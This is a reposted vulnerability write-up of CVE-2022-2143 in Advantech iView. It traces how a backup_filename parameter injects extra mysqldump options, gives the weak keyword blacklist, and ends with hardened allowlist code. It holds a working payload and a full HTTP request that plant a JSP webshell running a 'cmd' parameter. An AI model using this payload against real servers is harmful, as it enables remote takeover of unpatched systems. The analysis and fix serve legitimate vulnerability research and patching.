CVE-2022-2143 Advantech iView NetworkServlet Command Injection RCE

admin · 2022-07-06 17:11:06 · 249 views · 3,778 characters · 12 min 35 s read

Call-relationship query (Cypher)

MATCH (n:Class{NAME:'javax.servlet.http.HttpServlet'})-[:EXTEND]-(c:Class)-[:HAS]->(m:Method)-[:CALL*2]-(m1:Method{NAME:'exec',CLASS_NAME:'java.lang.Runtime'}) return *


Analysis

com.imc.iview.network.NetworkServlet#doPost


Two checks

com.imc.iview.utils.CUtils#checkFileNameIncludePath(java.lang.String)

Checks whether the path contains webapps, to stop a shell being written there.

com.imc.iview.utils.CUtils#checkSQLInjection only matches the input against a small blacklist of SQL keywords.

// Decompiled blacklist filter. Note that `model` is lower-cased first, so the
// two checks that still contain the camel-case "getRuntime" can never match.
public boolean checkSQLInjection(String model0) {
    boolean result = false;
    String model = model0.toLowerCase();
    if (!model.contains(" or ") && !model.contains("'or ") && !model.contains("||")
            && !model.contains("==") && !model.contains("--")) {
        if (model.contains("union") && model.contains("select")) {
            if (this.checkCommentStr(model, "union", "select")) {
                result = true;
            }
        } else if (model.contains("case") && model.contains("when")) {
            if (this.checkCommentStr(model, "case", "when")) {
                result = true;
            }
        } else if (model.contains("into") && model.contains("dumpfile")) {
            if (this.checkCommentStr(model, "into", "dumpfile")) {
                result = true;
            }
        } else if (model.contains("into") && model.contains("outfile")) {
            if (this.checkCommentStr(model, "into", "outfile")) {
                result = true;
            }
        } else if (model.contains(" where ") && model.contains("select ")) {
            result = true;
        } else if (model.contains("benchmark")) {
            result = true;
        } else if (model.contains("select") && model.contains("from")) {
            if (this.checkCommentStr(model, "select", "from")) {
                result = true;
            }
        } else if (model.contains("select/*")) {
            result = true;
        } else if (model.contains("delete") && model.contains("from")) {
            if (this.checkCommentStr(model, "delete", "from")) {
                result = true;
            }
        } else if (model.contains("drop") && model.contains("table")
                || model.contains("drop") && model.contains("database")) {
            if (this.checkCommentStr(model, "drop", "table")) {
                result = true;
            }
            if (this.checkCommentStr(model, "drop", "database")) {
                result = true;
            }
        } else if (!model.contains("sleep(") && !model.contains(" rlike ")
                && !model.contains("rlike(") && !model.contains(" like ")) {
            if (model.startsWith("'") && model.endsWith("#") && model.length() > 5) {
                result = true;
            } else if ((model.startsWith("9999'") || model.endsWith("#9999") || model.contains("#9999"))
                    && model.length() > 10) {
                result = true;
            } else if (model.contains("getRuntime().exec") || model.contains("getruntime().exec")
                    || model.contains("getRuntime()")) {
                result = true;
            }
        } else {
            result = true;
        }
    } else {
        result = true;
    }
    if (result) {
        System.out.println("Error: SQL Injection Vulnerability detected in [" + model0 + "]");
    }
    return result;
}

mysqldump can therefore be given a -w (--where) option whose value ends up written into the output file, and since -r may be passed more than once, a later -r overrides the file path set by the original -r.

The normal command is

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMC\TrapService\backup\aa"

Constructing the command-injection payload

2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"
POST /iView3/NetworkServlet HTTP/1.1
Host: 172.16.16.132:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

page_action_type=backupDatabase&backup_filename=2.sql"+-r+"./webapps/iView3/test.jsp"+-w+"<%25%3dnew+String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new+ProcessBuilder(request.getParameter(new+java.lang.String(new+byte[]{99,109,100}))).start()).getInputStream()))%25>"

After concatenation the command becomes

"C:\Program Files (x86)\MySQL\MySQL Server 5.1\bin\mysqldump" -hlocalhost -u root -padmin --add-drop-database -B iview -r "c:\IMC\TrapService\backup\2.sql" -r "./webapps/iView3/test.jsp" -w "<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((new ProcessBuilder(request.getParameter(new java.lang.String(new byte[]{99,109,100}))).start()).getInputStream()))%>"


This has the same flavour as getting a shell through a PHP log file.

Fix


The patch checks the session login state before handling the request.
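Added example (not code from the ChaBug post or from Advantech) of how the backupDatabase step itself can be hardened, in addition to the session check: backup_filename is accepted only if it matches a strict allowlist and resolves inside the backup directory, and mysqldump is started with an argument vector rather than one concatenated command line, so a quote or an extra -r/-w in the parameter can never become a new argument. The class name, the installation paths and the credentials are assumptions.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical hardened replacement for the backup command construction.
public final class SafeBackupCommand {
    // Allowlist instead of the keyword blacklist: a bare file name made of
    // letters, digits, '_' and '-', fixed ".sql" suffix, no quotes, spaces,
    // slashes or backslashes, so "-r"/"-w" smuggling has nothing to attach to.
    private static final Pattern NAME_ALLOWLIST = Pattern.compile("^[A-Za-z0-9_-]{1,64}\\.sql$");
    // Assumed paths; a real deployment would read them from iView's configuration.
    private static final Path MYSQLDUMP =
            Paths.get("C:\\Program Files (x86)\\MySQL\\MySQL Server 5.1\\bin\\mysqldump.exe");
    private static final Path BACKUP_DIR = Paths.get("C:\\IMC\\TrapService\\backup");

    // Second, independent control: even a name that passed the regex must still
    // canonicalise to a location under BACKUP_DIR (defence against future regex edits).
    public static Path resolveBackupFile(String backupFilename) {
        if (backupFilename == null || !NAME_ALLOWLIST.matcher(backupFilename).matches()) {
            throw new IllegalArgumentException("backup_filename rejected by allowlist");
        }
        Path base = BACKUP_DIR.toAbsolutePath().normalize();
        Path target = base.resolve(backupFilename).normalize();
        if (!target.startsWith(base)) {
            throw new IllegalArgumentException("backup path escapes the backup directory");
        }
        return target;
    }

    // Each option is its own argv element; the user-controlled value is passed
    // as one element after "-r" and is never spliced into a command string.
    public static List<String> buildCommand(String backupFilename, String dbUser, String dbPassword) {
        Path target = resolveBackupFile(backupFilename);
        List<String> argv = new ArrayList<>();
        argv.add(MYSQLDUMP.toString());
        argv.add("-hlocalhost");
        argv.add("-u"); argv.add(dbUser);
        argv.add("-p" + dbPassword);
        argv.add("--add-drop-database");
        argv.add("-B"); argv.add("iview");
        argv.add("-r"); argv.add(target.toString());
        return argv;
    }

    // The servlet's doPost should call this only after the session login check.
    public static Process run(String backupFilename, String dbUser, String dbPassword) throws IOException {
        return new ProcessBuilder(buildCommand(backupFilename, dbUser, dbPassword)).start();
    }
}
```

With this in place the payload from the request above (`2.sql" -r "./webapps/iView3/test.jsp" -w "..."`) is rejected at the allowlist before any process is started, and a rejection is a useful event to log and alert on.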



Originally published on the WeChat official account ChaBug: CVE-2022-2143 Advantech iView NetworkServlet Command Injection RCE

Reposted at CN-SEC (please keep this link when reposting): http://cn-sec.com/archives/1161737.html
